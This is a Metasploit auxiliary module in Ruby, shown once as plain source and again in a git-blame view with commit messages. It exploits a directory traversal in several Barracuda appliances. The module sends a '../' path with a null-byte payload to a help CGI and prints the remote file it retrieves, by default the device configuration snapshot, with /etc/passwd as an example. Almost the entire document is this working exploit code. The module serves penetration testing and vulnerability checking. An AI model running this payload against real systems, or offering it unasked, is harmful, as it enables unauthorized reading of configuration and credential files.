metasploit-framework/modules/auxiliary/scanner/http/barracuda_directory_travers...

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'Barracuda Multiple Product "locale" Directory Traversal',
      'Description'    => %q{
          This module exploits a directory traversal vulnerability present in
        serveral Barracuda products, including the Barracuda Spam and Virus Firewall,
        Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,
        this module will attempt to download the Barracuda configuration file.
      },
      'References'     =>
        [
          ['OSVDB', '68301'],
          ['URL', 'http://secunia.com/advisories/41609/'],
          ['EDB', '15130']
        ],
      'Author'         =>
        [
          'Tiago Ferreira <tiago.ccna[at]gmail.com>'
        ],
      'DisclosureDate' => 'Oct 08 2010',
      'License'        =>  MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('FILE', [ true,  "Define the remote file to view, ex:/etc/passwd", '/mail/snapshot/config.snapshot']),
        OptString.new('TARGETURI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
      ], self.class)
  end

  def run_host(ip)
    uri = normalize_uri(target_uri.path)
    file = datastore['FILE']
    payload = "?locale=/../../../../../../..#{file}%00"

    print_status("#{full_uri} - Barracuda - Checking if remote server is vulnerable")

    res = send_request_raw(
      {
        'method'  => 'GET',
        'uri'     => uri + payload,
      }, 25)

    if res.nil?
      print_error("#{full_uri} - Connection timed out")
      return
    end

    if (res.code == 200 and res.body)
      if res.body.match(/\<html\>(.*)\<\/html\>/im)
        html = $1

        if res.body =~ /barracuda\.css/
          if html.length > 100
            file_data = html.gsub(%r{</?[^>]+?>}, '')

            print_good("#{full_uri} - Barracuda - Vulnerable")
            print_good("#{full_uri} - Barracuda - File Output:\n" + file_data + "\n")
          else
            print_error("#{full_uri} - Barracuda - Not vulnerable: HTML too short?")
          end
        elsif res.body =~ /help_page/
          print_error("#{full_uri} - Barracuda - Not vulnerable: Patched?")
        else
          print_error("#{full_uri} - Barracuda - File not found or permission denied")
        end
      else
        print_error("#{full_uri} - Barracuda - No HTML was returned")
      end
    else
      print_error("#{full_uri} - Barracuda - Unrecognized #{res.code} response")
    end

  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
  rescue ::Timeout::Error, ::Errno::EPIPE
  end

end
add barracuda module from Tiago git-svn-id: file:///home/svn/framework3/trunk@10627 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-10 01:42:26 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
add barracuda module from Tiago git-svn-id: file:///home/svn/framework3/trunk@10627 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-10 01:42:26 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Auxiliary::Report`
			`include Msf::Auxiliary::Scanner`
add barracuda module from Tiago git-svn-id: file:///home/svn/framework3/trunk@10627 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-10 01:42:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize`
			`super(`
			`'Name' => 'Barracuda Multiple Product "locale" Directory Traversal',`
			`'Description' => %q{`
			`This module exploits a directory traversal vulnerability present in`
			`serveral Barracuda products, including the Barracuda Spam and Virus Firewall,`
			`Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,`
			`this module will attempt to download the Barracuda configuration file.`
			`},`
			`'References' =>`
			`[`
			`['OSVDB', '68301'],`
			`['URL', 'http://secunia.com/advisories/41609/'],`
			`['EDB', '15130']`
			`],`
			`'Author' =>`
			`[`
			`'Tiago Ferreira <tiago.ccna[at]gmail.com>'`
			`],`
			`'DisclosureDate' => 'Oct 08 2010',`
			`'License' => MSF_LICENSE`
			`)`
add barracuda module from Tiago git-svn-id: file:///home/svn/framework3/trunk@10627 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-10 01:42:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`Opt::RPORT(8000),`
			`OptString.new('FILE', [ true, "Define the remote file to view, ex:/etc/passwd", '/mail/snapshot/config.snapshot']),`
Fix barracuda_directory_traversal for full_uri 2015-11-25 17:18:17 +00:00			`OptString.new('TARGETURI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),`
Retab modules 2013-08-30 21:28:54 +00:00			`], self.class)`
			`end`
add barracuda module from Tiago git-svn-id: file:///home/svn/framework3/trunk@10627 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-10 01:42:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run_host(ip)`
Fix barracuda_directory_traversal for full_uri 2015-11-25 17:18:17 +00:00			`uri = normalize_uri(target_uri.path)`
Retab modules 2013-08-30 21:28:54 +00:00			`file = datastore['FILE']`
			`payload = "?locale=/../../../../../../..#{file}%00"`
add barracuda module from Tiago git-svn-id: file:///home/svn/framework3/trunk@10627 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-10 01:42:26 +00:00
Fix barracuda_directory_traversal for full_uri 2015-11-25 17:18:17 +00:00			`print_status("#{full_uri} - Barracuda - Checking if remote server is vulnerable")`
add barracuda module from Tiago git-svn-id: file:///home/svn/framework3/trunk@10627 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-10 01:42:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`res = send_request_raw(`
			`{`
			`'method' => 'GET',`
			`'uri' => uri + payload,`
			`}, 25)`
add barracuda module from Tiago git-svn-id: file:///home/svn/framework3/trunk@10627 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-10 01:42:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if res.nil?`
Fix barracuda_directory_traversal for full_uri 2015-11-25 17:18:17 +00:00			`print_error("#{full_uri} - Connection timed out")`
Retab modules 2013-08-30 21:28:54 +00:00			`return`
			`end`
Fix undefined method error [FixRM #8341] 2013-08-21 05:47:31 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if (res.code == 200 and res.body)`
			`if res.body.match(/\<html\>(.*)\<\/html\>/im)`
			`html = $1`
add barracuda module from Tiago git-svn-id: file:///home/svn/framework3/trunk@10627 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-10 01:42:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if res.body =~ /barracuda\.css/`
			`if html.length > 100`
			`file_data = html.gsub(%r{</?[^>]+?>}, '')`
fix false negatives, slightly reworked, fixes #2888 git-svn-id: file:///home/svn/framework3/trunk@10751 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-19 21:55:19 +00:00
Fix barracuda_directory_traversal for full_uri 2015-11-25 17:18:17 +00:00			`print_good("#{full_uri} - Barracuda - Vulnerable")`
			`print_good("#{full_uri} - Barracuda - File Output:\n" + file_data + "\n")`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
Fix barracuda_directory_traversal for full_uri 2015-11-25 17:18:17 +00:00			`print_error("#{full_uri} - Barracuda - Not vulnerable: HTML too short?")`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`elsif res.body =~ /help_page/`
Fix barracuda_directory_traversal for full_uri 2015-11-25 17:18:17 +00:00			`print_error("#{full_uri} - Barracuda - Not vulnerable: Patched?")`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
Fix barracuda_directory_traversal for full_uri 2015-11-25 17:18:17 +00:00			`print_error("#{full_uri} - Barracuda - File not found or permission denied")`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`else`
Fix barracuda_directory_traversal for full_uri 2015-11-25 17:18:17 +00:00			`print_error("#{full_uri} - Barracuda - No HTML was returned")`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`else`
Fix barracuda_directory_traversal for full_uri 2015-11-25 17:18:17 +00:00			`print_error("#{full_uri} - Barracuda - Unrecognized #{res.code} response")`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
add barracuda module from Tiago git-svn-id: file:///home/svn/framework3/trunk@10627 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-10 01:42:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`end`
add barracuda module from Tiago git-svn-id: file:///home/svn/framework3/trunk@10627 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-10 01:42:26 +00:00
			`end`